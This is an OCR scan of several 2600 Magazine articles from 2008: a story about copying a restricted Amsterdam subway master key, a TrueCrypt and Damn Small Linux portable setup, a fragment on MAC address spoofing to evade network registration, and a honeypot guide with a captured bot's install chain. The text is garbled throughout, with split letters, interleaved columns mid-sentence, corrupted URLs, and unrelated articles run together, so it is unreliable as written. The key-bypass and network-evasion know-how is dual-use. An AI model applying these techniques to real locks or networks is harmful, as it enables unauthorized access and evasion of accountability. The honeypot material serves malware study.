al l t he "t r i cks from t he street" t o open restr i cted, meani ng onl y t he factory had
bi cycl e l ocks, often us i ng s i mpl e tool s bl ank keys for i t . Besi des t he bl anks not
l i ke fi l ed down sci ssors or other fl at and bei ng avai l abl e, t he key al so had two
th i n pi eces of meta l . Sti l l , I can honestl y "wi ngs" or "r i bs" that operated pi ns on
say I never stol e a bi ke i n my l i fe. But I t he l eft and r i ght si de of t he l ock. For i ts
j ust had to know and test the t r i cks on t i me, t hi s was one of t he best h i gh secu
how t o open these l ocks. The real chal - r i ty l ocks on t he mar ket and i ts keys were
l enge came at around age 1 7. A fr i end of known to offer t he h i ghest degree of copy
mi ne, who was a graffi t i art i st, had access protect i on.
to a very speci al key: a master key t o t he But determi ned and chal l enged as I
Amsterdam subway. was to somehow get a copy, I deci ded
Th i s h i gh l y restri cted key wou l d open to compi l e a l i st of l ocks mi t hs from the
any door i n t he ent i re Amster dam s ubway Yel l ow Pages and pay t hem a l l a vi s i t to
system. Th i s i ncl uded t he n ucl ear shel - see i f they cou l d copy t he key. After al l ,
ters t hat are deep u nder neath some of t he l ocksmi t hs are t he peopl e wi t h knowl edge
stat i ons. I n parti cul ar, the ent r ance to t he on copyi ng keys, and i t must be possi
b
l e
nucl ear s hel ters was rat her spectacul ar. t o fi nd one that cou l d do i t ? Unfortu-
The best way to get i nto t he shel - natel y, most vi si ts di d not l ast l ong. I n
ters was t o take t he el evator t hat wou l d general , t h e l ocksmi t hs a l l l ooked a t me
nor mal l y br i ng you from street l evel to real fu n ny when s howi ng t hem the key.
t he su
b
way pl atfor m. The onl y di fference Some of t hem took t he effort to expl ai n
i s that i nstead of pushi ng t he el evator t hat t hey s i mpl y di d not have a bl ank
b
uttons you wou l d i nsert t he key i n t he key for i t, wh i l e others j ust sai d " no" and
keyhol e j ust bel ow t he buttons and t ur n poi nted me to t he door. I nstead of gi vi ng
i t . Now t he el evator wou l d not stop at up, I l ear ned a l i ttl e from each vi s i t and
t he pl atfor m l evel
b
ut i nstead wou l d go was a
b
l e to as
k
more to-the-poi nt
q
ues-
Pa
g
e 26
2600 a
g
azme
ti ons at my next vi si t. degrees, the l ock stopped and the key got
Fi nal l y, after at l east 2 0 vi si ts, I found stuck! No matter how I tri ed, I cou l d not
a l ocksmi th that di d not send me off turn the key l eft or ri ght, nor get it out of
strai ght away. Th i s l ocksmi th was very the l ock. I pan i cked and came cl ose to the
curi ous about what the key was for and I poi nt of breaki ng of the head of the key
deci ded to be open with hi m. So I started and j ust goi ng home. But afer I cal med
expl ai n i ng that I had no cri mi nal i ntent down a l i ttl e and started to anal yze the
wi th thi s key. I f I had, I woul d have used probl em, I came to the concl usi on that
i t ri ght away and not bothered to copy i t. the mi ssi ng si de wi ng(s) was probabl y the
And I tol d h i m i t was the top master key reason for the l ock j ammi ng. So I started
for the Amsterdam subway. I expl ai ned l ooki ng around for somethi ng thi n to poke
to h i m that by now I had become sort of the si de channel of the l ock. I ended up
obsessed to copy thi s "uncopyabl e key" wi th a bent paper cl i p ( or was i t a needl e?)
and that I was determi ned and wou l d that, t o my great rel i ef, al l owed the l ock
succeed one way or another. After al l , to turn back to t he ori gi nal pos i ti on where
techni cal l y it is j ust an odd-shaped pi ece I was then abl e to take the key out agai n.
of meta l .
Phewwwww.
After thi n ki ng it over, he sai d he cou l d Back home I tri ed to thi n k of a way
hel p me a l i ttl e bi t. He studi ed the key for to somehow create wi ngs on the key. I
qui te some t i me and started compari ng i t tri ed to sol der them on usi ng a sol der i ng
wi th some bl anks from hi s racks. I n a few i ron. One of the fi rst probl ems was that i f
mi nutes he came up wi th a bl ank key that I sol dered a wi ng on one si de, i t wou l d
more or l ess had the same profi l e as the come l oose when tryi ng to sol der one
master key, except i t di d not have wi ngs. to the other si de. The second probl em
And he made i t very cl ear that he woul d was that t he l ead was not strong enough
not hel p me wi th the wi ngs; I was on my to keep support the thi n sma l l wi ngs
own for that part. The bl ank he found was even when I managed to sol der them on
a l i ttl e fatter than the ori gi nal , meani ng i t correctl y. The key si mpl y was too fragi l e
had more materi al on i t t han t he master and not usabl e t hi s way. So I had to thi n k
key an d wou l d not yet fi t the l ock. The of someth i ng el se.
l ocksmi th advi sed me to get a fi ne fi l e I had some good contacts wi th an opti c
and try to fi l e or gri nd away some of the shop, and one of the opti ci ans showed
metal i n strategi c pl aces unti l it was s l i m me how they repai red broken metal
enough to fi t the target l ock. He made frames. They used a techn i que cal l ed hard
me three keys and was ki nd enough to sol deri ng. Wi th hard sol deri ng you use a
al ready copy the normal seven cuts of the gas fl ame to heat the object and sol der
master key on them. I was now getti ng t he parts together usi ng thi n s i l ver or gol d
somewhere! sti cks. When done properl y, you do not
At home I studi ed both the ori gi nal and even noti ce the frame has been repai red.
the "fat" copy for a l ong ti me and deter- I real i zed I had to l earn and master thi s
mi ned three posi ti ons where I wou l d have hard sol deri ng techni que, and I asked i f
to remove mater i al from the copy. After they cou l d teach me. It took me some
spendi ng 30 mi nutes wi th my fi l e, I ended ti me, but fi nal l y I managed to master the
up wi th a rel ati vel y thi n key that I fi gured hard sol deri ng techni que. And I was fi nal l y
woul d fi t t he subway l ocks. ready to sol der wi ngs on my key . . . .
The next day I went to the subway to Sti l l , I had the same probl em as wi th
gi ve i t a try, and somewhere i n a dark l ead sol der. I f one r i b was fi xed, i t came
corner I i nserted the key i nto one of the l oose when I tri ed to sol der the other si de.
many mai ntenance l ocks. These l ocks The sol uti on was to use two di fferent
normal l y j ust cover power outl ets used ki nds of sol deri ng materi al . One type
by cl eaners or workers and someti mes are wou l d mel t at a hi gh temperature, the
not used much at a l l . To my surpri se the other at a l ow(er) temperature. My fi rst
key entered smoothl y and . . . turned! exper i ments were sol deri ng one r i b usi ng
However, thi s euphori c moment di d si l ver t hrough t he hard sol der method
not l ast l ong. As I turned the key 90 ( hi gh mel ti ng poi nt) whi l e for t he other
Summer 2008 Pa
g
e 27
r i b I used a sol deri ng i ron and l ead
based sol der ( l ow mel ti ng poi nt) . Later I
mastered the hard sol der techni que even
better so I cou l d sol der one si de of the key
wi th s i l ver sol der ( hi gh mel ti ng poi nt) and
the other si de usi ng gol d sol der t hat had a
sl i ghtl y l ower mel ti ng poi nt.
And now, two years after seei ng the
subway key for the fi rst ti me, I was ready
for the fi nal test. I went back to the same
dark corner of the subway system and
tri ed my key. And i t wor ked l i ke a charm.
I coul d not have been happi er.
Truth is I never used it much. For me
the chal l enge was to copy the key. But
some of my fr i ends had great fun wi t h i t.
I n the ear l y 90s we were known as the
unoffi ci al tou r gui des of the Amsterdam
underground, proudl y showi ng a l l our
( i nternati onal ) fri ends the Amsterdam
nucl ear shel ters.
But t he story conti nues . . . .
After some expl or i ng, my fri ends tol d
me they found a few doors deep i nsi de
the system that thi s master key coul d not
open. It coul d enter the l ock, but not tur n.
Thi s was a new chal l enge.
keys. I j ust added them to my key ri ng.
The next t i me I was present at one
of the underground tours, we ended up
at the doors we coul d not open. Onl y
then I remembered t he experi mental
keys I made, and gave them a try. And
guess what? One of them worked! Now
that was a trul y euphor i c moment! And I
i mmedi atel y real i zed I had better not try
to fu l l y rotate the key as i t di d not have
wi ngs yet. So after t urn i ng it ten degrees,
I went back to the ori gi nal posi ti on and
removed i t from the l ock.
I sol dered on wi ngs the same day and
fou nd t hat the key worked rea l l y wel l .
(As to be expected behi nd the door there
were j ust some more maze tunnel s and
some h i gh vol tage equ i pment you do not
want ki ds pl ayi ng around i n . ) We cal l ed i t
the "super master key" as we never found
a l ock i t cou l d not open i n t he enti re
Amsterdam subway system. And it took
some t i me to real i ze what I had achi eved.
I made a copy of an uncopyabl e super
master key, of whi ch I had never seen
the ori gi nal key. I was root at the subway
system, and i t earned me my n i ckname
"The Key."
Now there is a reason for th i s confes
si on. Fi rst of al l , I j ust turned 40, and
fi gured an over-20-year-ol d story cou l d be
tol d by now. The second reason i s t o show
you that no matter how soph i sti cated
a mechani cal l ock is, it can al ways be
bypassed by a determi ned attacker. And
the fi nal reason i s that i t's a ni ce i ntroduc
ti on to my presentati on at The Last HOPE
conference. The ti tl e of t he presentati on
wi l l be "Methods of Copyi ng Hi gh Secu
ri ty Keys. " And i t wi l l cover many more
modern techni ques t han t hi s 20-year-ol d
story.
I hope to see you there, and urge you
to br i ng your uncopyabl e mechani cal
keys for us t o eval uate.
Barry Wels is president and founder
of Toool, The Open Organisation Of
Lockpickers. Toool ' s expertise, integ
rity and publications are well received
in the lock industry and Toool is often
requested to do tests for lock manufac
turers and organizations such as Dutch
Consumer Reports. He runs a weblog at
http://www. toool. nllblackbag.
At about the same t i me we met a group
of arti sts who were offi ci al l y al l owed to
gi ve an art performance i nsi de the subway
system. They had been gi ven a very l ow
pri ori ty key that cou l d onl y open two
doors i n the enti re subway system. And
even though we cou l d al ready open these
doors wi th our own master key, I was
sti l l eager to exami ne th i s l ow pri ori ty
key. Compar i ng the two keys I found
they were al most i denti cal . On j ust two
out of seven posi ti ons the keys di fered. I
di d not expect much of i t, but deci ded to
combi ne both keys and cut the remai n i ng
two combi nati ons. To cl ari fy th i s: if you
have two di fferent val ues i n a key system,
you can make four keys. Let's say the
master key had a cut depth 2 and 3 on the
posi ti ons that di ffered. And l et's say the
l ow pri ori ty keY .had a cut 4 and 5. The
remai n i ng two combi nati ons wou l d be a
key cut to 2 and 5, and one cut to 4 and
3. To t hi s day I sti l l don't know why I cut
these extra keys. I guess I was j ust curi ous.
And I di d not have h i gh hopes i t wou l d
open anythi ng more t hen t he l ocks we
cou l d al ready open. So I never bothered
to sol der wi ngs on these two experi mental
Pa
g
e 28 2600 Ma
g
azine
R PTRlE
L IfX
by Aaron
Us i ng TrueCrypt al ong wi t h DamnSmal l
L i n u x ( DSL) , i t i s poss i bl e to create a portabl e
encrypted GNU/Li n u x work envi ronment
whi ch you can take wi t h you from PC t o Pc.
As I have l ost a n u mber of USB dr i ves, I fi nd
that havi ng t he data on t hem be encrypted by
defaul t provi des s ome pi ece of mi nd.
The basi c concept here i s t o u s e TrueCrypt
to encrypt the maj ori ty of a USB dri ve. I ns i de
the encrypted vol ume wi l l be DSL al ong wi t h
QEMU, whi ch a l l ows the Li nux i nsta l l at i on to
be r un on a Mi crosoft Wi ndows machi ne.
Steps
1 . I nstal l TrueCrypt on your Pc. You can
r un TrueCrypt wi thout i nsta l l i ng i t ; th i s i s
cal l ed "travel er mode. " For the purposes of t hi s
exampl e, t hough, i t i s assumed t hat TrueCrypt
i s i nsta l l ed l ocal l y on your Pc. Downl oad
TrueCrypt from ht tp : / /w. truerrypt . com;
then, extract and r un the ,e tup . exe program.
2. Make a TrueCrypt vol ume on the U
S
B
drive. I nsert the USB dr i ve and wai t for the
system to recogni ze i t. For thi s step, we are
goi ng to create an encrypted vol u me. I n
TrueCrypt, sel ect "Vol umes-Create New
Vol ume", whi ch wi l l fi re up the Vol ume
Creat i on wi zar d. Sel ect "Create a standard
TrueCrypt vol ume, " and hi t next. Sel ect " Fi l e"
and create a fi l e on the USB dr i ve. Take the
defaul ts for Encrypti on Al gor i t hm and Hash
Al gor i t hm, and h i t next. I n the next di al og
box, set the s i ze of t he vol ume; typi ca l l y you
can choose an amount equal to s i ze of the
dr i ve, subtracti ng 20 megabytes for the True
Crypt travel er vol ume. I t wi l l then ask you
for a vol ume password; be s ure to remember
thi s or you wi l l never be abl e to access t hi s
vol u me aga i n . E nter t he password, and hi t
next. I t wi l l t hen begi n t o format t he vol u me.
After t hi s, you wi l l have a n encrypted vol ume
on your USB devi ce.
3. I nstal l TrueCrypt Travel er mode on the
USB device. The next step i s to i nsta l l True
Crypt Travel er mode on the dr i ve. To do t hi s,
go to "Too I s- Travel er Di s k Set up" i n the True-
Crypt program. Thi s wi l l take you to a set up
screen. Sel ect t he dr i ve l etter for t he USB
dri ve. Sel ect "Auto-mount TrueCrypt vol u me
( speci fi ed bel ow) " from the AutoRun confi gu
rat i on sect i on. Then, sel ect t he encrypted
vol u me i n the "TrueCrypt vol ume to mount"
sect i on. Then, hi t "Create. "
4. Test the TrueCrypt vol ume. Safel y
remove the dr i ve and rei nsert i t. You shou l d
get t he TrueCrypt prompt as ki ng for the
vol ume' s password. After that, the dr i ve
shou l d be mounted as the next ava i l abl e
dr i ve l etter. I f th i s works, we shou l d be ready
for the next step.
5. I nstal l OSl on the encrypted
vol ume. Down l oad ds l -embedded
from the DamnSma l l Li n ux websi te,
h t L , / / \v . d c m i u c l 1 l 1 i. X .
Unzi p the contents to the encrypted vol ume.
6. Create a hard drive I mage for OSlo
Fol l ow the di rect i ons i n the readme fi l e
i ncl uded wi t h ds l -embedded t o "Create a
QEMU Vi rtual Hard Di s k and use the dsl - vhd.
bat fi l e. " Fortunatel y, t hi s onl y has t o be done
once per USB dr i ve.
7. Test the OSl configurati on. Safel y
remove t he dr i ve and rei nsert i t . You shou l d
get t he TrueCrypt prompt as ki ng for your
password. After you enter that, a n expl orer
wi ndow shou l d pop up. Sel ect ds l -vhd. bat,
and you shou l d be off and run n i ng.
Caveats
TrueCrypt run n i ng i n Travel er mode wi l l
l eave beh i nd evi dence on the P C that i t
has been run and that a vol u me has been
mounted.
TrueCrypt run n i ng i n Travel er mode
requ i res admi n i strator pr i vi l eges to be abl e to
mount dri ves. Thi s i s a l i mi tat i on i n the way
Mi crosoft Wi ndows handl es devi ces. If you
i nsta l l TrueCrypt on t he system, t hen you can
set i t up so i t does n' t need admi n i strator r i ghts
to run .
Cl eanl y s hutti ng down t h e DS L envi ron
ment i s a good i dea. Not s hutti ng i t down
correct l y can l ead to fi l e corrupt i on probl ems
i n the addi t i onal save space.
Summer 2008
Pa
g
e 29
I f you want to save anythi ng, you have
to save it to the / mnt l hdb di rectory. You wi l l
need to b e root to be abl e to save data here.
To change t hi s, open a root shel l by choosi ng
"XShel l s-Root Access---Dark" and typi ng
chmod O / mnt / hdb i nto the wi ndow that
pops up. After t hat, you wi l l be abl e to save
documents to the / mnt / hdb fi l esystem and
have them preserved between boots.
Options
Note that the method presented here
i s merel y one way to bui l d a portabl e
encrypted envi ronment.
FreeOTFE can be used i n pl ace of True
Crypt. One of the advantages of FreeOTFE
over TrueCrypt i s that Li nux can use
e-crypt t o read FreeOTFE vol umes,
i nstead of i nsta l l i ng TrueCrypt on a L i nux
box.
Another di stri buti on of L i nux can be
substi tuted for DSL. For exampl e, nUbuntu
can be used to create a portabl e secur i ty
tool ki t, or Knoppi x can provi de a more fu l l y
featured Li nux di st ri buti on. Usi ng Bart ' s PE,
by Pl asticman
i t i s even possi bl e to create a versi on of
t hi s proj ect whi ch r uns Mi crosoft Wi ndows
i nstead of L i nux.
You can us e an SD card, a memory
sti ck, or a portabl e hard dri ve i nstead of a
USB dri ve to hol d t he envi ronment. Many
systems now come wi t h SD card readers,
and some currentl y don ' t di sabl e t hem. A
fi rst-generati on Appl e i Pod shuffl e makes
a wonderfu l way to carry the envi ronment
around wi th you.
TrueCrypt has many addi t i onal opti ons,
such as hi dden vol umes and stronger
encrypt i on al gori t hms. Vi si t the TrueCrypt
websi te for more i nformat i on .
DSL has opt i onal packages, such as tor,
whi ch can be used to create a more secure
brows i ng envi ronment.
Li nks
DamnSma l l Li nux ( DSL) :
ht tp : / /ww. damnsma l l l i nux . org
TrueCrypt: ht tp : / /ww. truecrypt . org
QEMU: ht tp : / /ww. qemu . org
our pri vacy, we must bui l d a l i st of MAC
addresses that are a l ready regi stered on
As a col l ege student, a hacker, and the network under di fferent users. The tool
an a l l around semi -paranoi d person, I I used for t hi s was nmap, whi ch is a free
recentl y became obsessed wi t h protecti ng open-sou rce port scanner ava i l abl e for both
my personal pri vacy and secur i ty. At my Uni x and Wi ndows systems. I won ' t go i nto
uni versi ty, whenever a user con nects a new the detai l s on how to use nmap; i nstead,
computer to the network, they must l og i n you can l ook a t \. :i LULC:1 l . CCu,
wi t h thei r Uni que I D. After t hi s l ogi n proce- whi ch i s a great resource about proper use
dure, the MAC address of the user ' s network of th i s tool .
devi ce i s regi stered wi th t he network under After I bui l t my l i st of MAC addresses, I
thei r name. Now, as a sysop, I fu l l y under- wrote a bash scri pt whi ch wi l l shut down
stand the necess i ty and benefi ts of t hi s sort my network devi ce, pi ck a new MAC
of regi strat i on procedure. However, as I address at random out of that l i st, assi gn i t
al so enj oy my pri vacy, I wou l d prefer that to my network devi ce, and start i t back up.
nobody has t he abi l i ty to see what I am The scri pt al so has the abi l i ty manual l y to
doi ng on any network. assi gn a MAC address, and to restore my
The key to bei ng abl e to get around th i s or i gi nal MAC address as wel l . The purpose
type of l oggi ng i s not i ci ng how the network of t hi s scri pt was for me to conceal my own
devi ces are associ ated wi th users: the MAC network
.
uses; as wi t h a l l th i ngs, though,
address. Changi ng your MAC address i s a there are both good and evi l uses. I do not
s i mpl e task on any system, but the probl em condone the use of t hi s scri pt i n i l l egal act i v
i s that you have t o re- regi ster yoursel f i t i es, as i t cou l d potent i al l y get an i nnocent
whenever you change i t, putt i ng you back person i n a l ot of troubl e. The scri pt i s ava i l
a t square one. So, i n order t o mai ntai n a bl e from the 2600 code reposi tory.
Pa
g
e 3
0 2600 Ma
g
azine
by LOj l k
I Oj l k@I OP k. net
the eval uati on versi on
of Di amondCS Port
Expl orer. Th i s shows you wh i ch processes are
I ' m goi ng to show you how to set up a ti ed to wh i ch ports and whi ch ports are sendi ng
honeypot t o capture mal ware, but fi rst a few and recei vi ng data. Fourth, Process Expl orer by
ground r ul es. Thi s arti cl e is not to be i nter- Sysi nternal s/Mi crosoft. Thi s is l i ke task manager
preted as a how-to about creat i ng or h i j acki ng on steroi ds. Fi fth, Ul traVNC server or another
botnets. Thi s arti cl e i s al so not to be i nterpreted VNC server that you are fami l i ar wi t h. Thi s
as anyth i ng but a bi t of i nformati on. As such, I i s n' t necessary but wi l l speed up the i nfecti on
can' t be hel d l i abl e for how you use the i nfor- of your honeypot by botware. And, fi nal l y, a
mati on. If you don ' t know about botnets, do a bl ank notepad wi ndow on another mach i ne, or
s i mpl e search on Wi ki pedi a. That shou l d get go ol dschool and use a pen and paper.
you started. I have changed the names of I RC It shou l d be noted that wh i l e your machi ne
channel s, n i cks, and forums, as wel l as the I P wi l l be i nfected regardl ess, i t woul d be wi se to
addresses for I RC servers, as they aren' t needed make your honeypot l ooked " l i ved- i n . " Most
to show the methodol ogy. Pl ease keep i n mi nd scri pt ki ddi es wi l l i nfect any machi ne they can,
that peopl e make mi stakes; I am not perfect. but the more savvy bot herders wi l l avoi d a
Al so, there are fi ve hundred mi l l i on ways or machi ne that l ooks l i ke an obvi ous honeypot.
more to do the thi ngs descri bed i n thi s art i cl e; Your defaul t Wi ndows 2000 Advanced Server
t hi s i s j ust one of them. DDoSi ng my si te won' t i nstal l ati on wi t h t he si ckl y bl ue desktop won ' t
make your bots better. I f you see me onl i ne, say get nearl y the attenti on that Grandma' s home
h i . On to the art i cl e. computer woul d. Set a di fferent desktop i mage,
In a perfect wor l d, you woul d have a connec- and add a few spreadsheets on the desktop
ti on to the i nternet that i s n' t t hrough a carefu l l y l i st i ng "account i nformati on" or reci pes.
supervi sed network, and most l eni ent commer- Perhaps you al so want to have a text fi l e or
ci al I SPs offer th i s ki nd of connect i on. You are two wi th notes from fake company meeti ngs or
pretty much out of l uck on mi l i tary bases and pi ctures of the grandki ds. The i deal target for bot
in most hotel s, but you never know! There are a herders is a l onel y, al ways-on, corporate work-
number of arguments for usi ng ei ther a physi cal stati on that i s i n use by mul t i pl e peopl e. Thi nk
mach i ne or a vi rtual host for your honeypot. For of a pri nt server or the guest machi ne at the end
exampl e, i t' s poss i bl e for software to detect the of the hal l way. Accountabi l ity on these types of
use of vi rtual i zati on envi ronments l i keVMware. mach i nes i s al most al ways at a mi n i mum and
Some botnets may be programmed not to thei r tubes to the i ntarweb are usual l y huge,
i nfect a host on a vi rtual machi ne. Al so, cross- whi ch i s exactl y what the bot herder wants. I f
contami nati on to your physi cal mach i ne coul d you don ' t have a fat pi pe, make your honeypot
occur. However, usi ng a vi rtual mach i ne al l ows l ook l i ke someth i ng your grandparents use to
you to restore your honeypot to a pri st i ne i nstal l send pi ctures and emai l to fri ends and fami l y.
wi th a s i mpl e cl i ck of the mouse. Th i s arti cl e Dust off those soci al engi neeri ng ski l l s !
i s wri tten to be i ndependent of t he choi ce you Next, unpl ug the network cabl e to your
make i n th i s regard. Whi chever route you go, honeypot. Th i s is the onl y way to be compl etel y
be prepared for the possi bi l i ty that al l the data certai n that you are not on the network. I nsta l l
on the mach i ne hosti ng the honeypot a n d on your Wi ndows as wi th defaul t setti ngs, and
any other mach i ne on the same network wi l l wri te these setti ngs down i n your notepad.
get hosed by some retarded expl oi t. Th i s makes it easi er to manage t hi ngs: trust
You wi l l need a few th i ngs before you begi n. me. Change your Admi ni strator password to
Search on Googl e or s i mpl y use s i mi l ar uti l i ti es "password. " I nsta l l any dr i vers that you need
wi th whi ch you are more fami l i ar. Fi rst, Wi n2k t o operate your hardware. I nsta l l Wi reshark,
or Wi nXp Servi ce Pck one. We' re tal ki ng vi rgi n Process Expl orer, Port Expl orer, and Ul traVNC
Mi crosoft software her e. Your goal i s maxi mum Server. Change t he password for Ul traVNC
vul nerabi l i ti es. Second, a packet sni ffer you are Server to "password. " I f you are runni ng a server
fami l i ar wi th. Most sane peopl e use Wi reshark, versi on of the as, change your passwords for
but there are many others out there. A good FTP and l i S to "password" as wel l . Di sabl e
project woul d be t o wri te your own ! Th i rd, the Messenger Servi ce. Thi s i s not requi red,
Summer2008
g
e 31
but it reduces annoyi ng popup boxes beggi ng were upl oaded to you r honeypot, what those
you to i nsta l l mal ware. Reboot. Log i n to you r fi l es di d to you r honeypot, a nd how t o store
honeypot and start Wi reshark. I t ' s al ways ni ce those fi l es so you can l ook at them l ater i n a
to have it update the wi ndow i n real ti me, so steri l e envi ronment. Vi ewi ng whi ch processes
check that box. Al so start Process Expl orer and are connecti ng to strange ports by usi ng Port
Port Expl orer. Now, pl ug you r network cabl e i n. Expl orer and i denti fyi ng those fi l es are good
I f you have a hardware fi rewal l or router such pl aces t o start, but you mi ght mi ss a few dl l
a s that bl ue Li nksys box by you r cabl e modem, or i n i fi l es that go wi th the mai n executabl e.
you need t o l og i n t o i t and confi gure a DMZ On a defaul t i nsta l l ati on of Wi ndows wi th a
wi th the I P address of you r honeypot. Thi s wi l l rel ati vel y ti ny number of fi l es, the s i mpl est
tel l you r router to expose the honeypot to the way to fi nd everythi ng i nvol ved i s to search
network, sans router protecti on. you r machi ne for every fi l e on the hard di sk.
Perhaps t hi rty seconds t o thi rty hou rs l ater, Go to Start-Search-AI I fi l es and fol ders-". ",
you r host wi l l be i nfected. Some i nfecti ons are and then sort by modi fi cati on date by cl i cki ng
more obfuscated t han others, but you can tel l " Date Modi fi ed" twi ce to s ummon a l i st of
that your honeypot has defi ni tel y been i nfected l i kel y suspects. These i nstructi ons wi l l probabl y
when i t starts a l ot of outgoi ng connecti ons generate a few l etters gi vi ng far more effi ci ent
on port 1 35, 1 37, 1 39, or 445 . A l ot of i nfec- and cl ever ways to do thi s and l i st i ng everyth i ng
ti on vectors are on these ports, for obvi ous that ' s wrong wi t h t hi s way and why. I suggest
reasons. Al though your host is compromi sed, it that the newbi e reader fi nd and read a few of
wi l l probabl y be i nfected wi th a si mpl e mai l er those l etters t o i mprove upon t hi s method. I t
troj an or a worm i nstead of a bot. Ei ther way, probabl y wou l dn' t hurt the ol d pro to take a
you have mal ware to exami ne. At t hi s poi nt, you l ook, as wel l .
have a coupl e of opti ons. You can i mmedi atel y Ensure that you have a cl ean medi um to
di sconnect your honeypot from the network as store these l i ttl e nasti es ! I can ' t i mpress upon
you have what you need. You cou l d al so l eave readers enough that you shou l dn' t be usi ng
you r host ru n n i ng and capture the traffi c usi ng your roommate' s backup dr i ve, you r personal
Wi reshark. Th i s i s recommended i f you want to USB thumb dri ve, or a network share to store
ensure that you wi l l be i nfected by a bot and al l th i s mal ware! You are fl i rt i ng wi th di saster
to observe someone sendi ng commands to by mi xi ng the two wor l ds of honeypot and
bots. Beware, however, that i f you l eave your personal network. The best way t o do t hi s
honeypot connected t o t he network for an wou l d be t o fi nd a vi rgi n USB thumb dri ve or to
extended peri od, you wi l l l i kel y get fl agged by start wri ti ng them to CD. Store each i nstance of
you r I SP for a l l that excessi ve traffi c. If you are mal ware i n i ts own di rectory.
havi ng troubl e gett i ng your honeypot i nfected, I ' m goi ng to show you how I observed and
i t certa i n l y hel ps t o i nsta l l programs l i ke Mi cro- di ssected an exampl e bot that I took from my
soft SQL Server 2 000, Exchange Server 2000, or i nfected honeypot. Thi s anal ysi s concerns j ust
Outl ook Express. Use defaul t setti ngs and pass- one va ri ety of bot, whi ch I wi l l cal l TardBot.
words. The goa l here i s to i ncrease the number The i nsta nce ofTardBot that I grabbed for t hi s
of vu l nerabi l i ti es on you r machi ne. anal ysi s was i nstal l ed on a machi ne that was
Note that by usi ng VNC, you r honeypot wi l l ru n n i ng VNC wi th very defaul t l ogi n creden-
be i nfected pretty qui ckl y. However, i t wi l i l i kel y t i al s. The hacker who i nfected my honeypot
be attacked by a rea l human bei ng i nstead of a used other bots to scan var i ous I P address
bot. VNC a l l ows a person to remotel y operate ranges l ooki ng for computers ru nni ng a VNC
you r computer as i f they were si tti ng i n front of server wi th weak l ogi n credent i al s or an ol der,
it. Therefore, you want to obfuscate the fact that expl oi tabl e vers i on of the server. Accordi ng
you are run n i ng Wi reshark, Port Expl orer, and t o my sni ffer l ogs, hi s bots fi rst scanned the
programs l i ke that. I f the hacker spots any of honeypot on VNC' s TCP port 5900 about fou r-
these programs, it wi l l send up huge red fl ags. teen hours before he arri ved personal l y. There
He or she wi l l l i kel y l eave you r honeypot al one was repeated scanni ng of the honeypot on the
and poss i bl y report your I P to hi s or her fri ends VNC port, spaced about an hour and a hal f
as a honeypot. Keep you r programs mi ni - apart, perhaps t o check upt i me.
mi zed, or, at the very l east, keep them i n t he Though there i s genera l l y a trend for hackers
System Tray. Leave your honeypot al one; you to do t hei r work dur i ng the ni ght at the host
don ' t want to keep screwi ng wi th the mouse l ocati on, th i s hack was done at 1 0: 1 5am on a
every fi ve mi nutes, because t hi s wi l l scare the Tuesday morni ng l ocal t i me. Th i s i s perhaps not
attacker away i f he sees i t. the smartest move the attacker cou l d' ve made,
Whatever deci si on you make about how consi deri ng that the honeypot was di sgu i sed
much mal ware to col l ect, you need to preserve as a corporate workstat i on. He l ogged i n to
as much of the i nfect i on as poss i bl e. Thi s t he honeypot and opened I nternet Expl orer,
means that you need to i denti fy whi ch fi l es and then navi gated to a rooted webserver
Pa
g
e 3
2
2600 Ma
g
azine
wi th a . ro domai n, where the hacker stored
one of hi s botware executabl es. After the
executabl e was downl oaded, he ran i t vi a
Start .Run. That ' s i t. The hacker t hen l ogged
off, not even botheri ng to remove hi s work
from the browser ' s hi story l i st. The executabl e
was a dropper, a sma l l and s i mpl e appl i cati on
that downl oaded the rest of hi s botware to
C : \Windows \ Temp. Accordi ng to the s ni ffer
l ogs, the mai n botware was downl oaded from
a di fferent rooted webserver than the dropper.
TardBot is actual l y a set of barebones uti l i
ti es worki ng together i nstead of j ust one execut
abl e. You wi l l fi nd that thi s i s a very common
practi ce, s i nce a l ot peopl e runni ng botnets
general l y l ack any real computer ski l l s; they
are thus are i ncapabl e of wri ti ng or too l azy
to wri te thei r own programs. Because of t hi s,
they wi l l use prepackaged bot ki ts readi l y avai l
abl e i n a vari ety of pl aces. You woul d not be
mi staken in cal l i ng them scri pt ki ddi es, though,
l i ke any communi ty, there are a number of very
i ntel l i gent and experi enced hands doi ng busi
ness i n thi s fi el d.
TardBot i s packaged i n an executabl e
archi ve approxi matel y 2. 5 megabytes i n s i ze.
I ran thi s archi ve several ti mes on a di scon
nected, vani l l a Wi ndows i nstal l ati on to anal yze
how i t embedded i tsel f i n the honeypot. Once
downl oaded, TardBot i s executed by the
dropper. I f the honeypot was i nfected automati
cal l y by a Wi ndows expl oi t i nstead of through
VNC, there woul d be no vi si bl e evi dence that
the machi ne was compromi sed. The i nstal l a
ti on i tsel f i s al most compl etel y transparent.
To the average offi ce worker or grandmother,
the whol e process woul d go by so qu i ckl y
t hat they probabl y woul dn' t thi nk twi ce about
i t. Dependi ng on the purpose of the bot, the
user may noti ce a sl owdown of the computer
or the network. Thi nk how many ti mes you ' ve
heard someone menti on that thei r computer i s
"runni ng sl ow." Mal ware can be a si gni fi cant
cause of t hi s probl em.
The executabl e archi ve dropped several
executabl es, thei r associ ated i n i and dl l
fi l es, a n d a batch fi l e i nto the same di rec
tory that i t was downl oaded to. Next, the
archi ve ran the batch fi l e, whi ch I wi l l cal l
pwned . bJt. I t i s the heart of the i nstal l ati on
procedure. I t fi rst ran a sma l l appl i cati on
that added regi stry keys to HKLM/ SOFTWARE/
M i c r o s o f t / Wi ndows / C u r r e n t Vc r s i on !
Run for a n FTP server and for the mai n bot. I t
t hen conducted a s i l ent i nstal l ati on of ServU, an
FTP server commonl y used by bot herders. The
i n i fi l es associ ated with i t were custom-wri tten
wi th accounts and passwords whi ch the hacker
woul d know. After the i nstal l ati on compl eted,
pwned . bat started the mai n bot appl i cati on,
whi ch i tsel f ran another appl i cati on on startup,
a "guardi an" program that made sure the mai n
bot program was runni ng and woul d start i t
otherwi se. The l ast thi ng pwned . bat di d was to
cl ean up after i tsel f by del eti ng the dropper, the
TardBot executabl e archi ve, the Serv- U i nstal
l ati on fi l es, and i tsel f. TardBot was now ful l y
functi onal .
The mai n bot appl i cati on connected to
several di fferent I RC servers and j oi ned at
l east one password-protected channel on each
server, as determi ned by the custom-wri tten i n i
fi l es. I t i s i mportant to note that a pl ai ntext fi l e
wi t h server, username, and password i nforma
ti on can have any extensi on, even exe. I RC i s
by far the most common protocol used to l i n k
i ndi vi dual bots to thei r masters a n d to other
bots. The great benefi t (or drawback) to usi ng
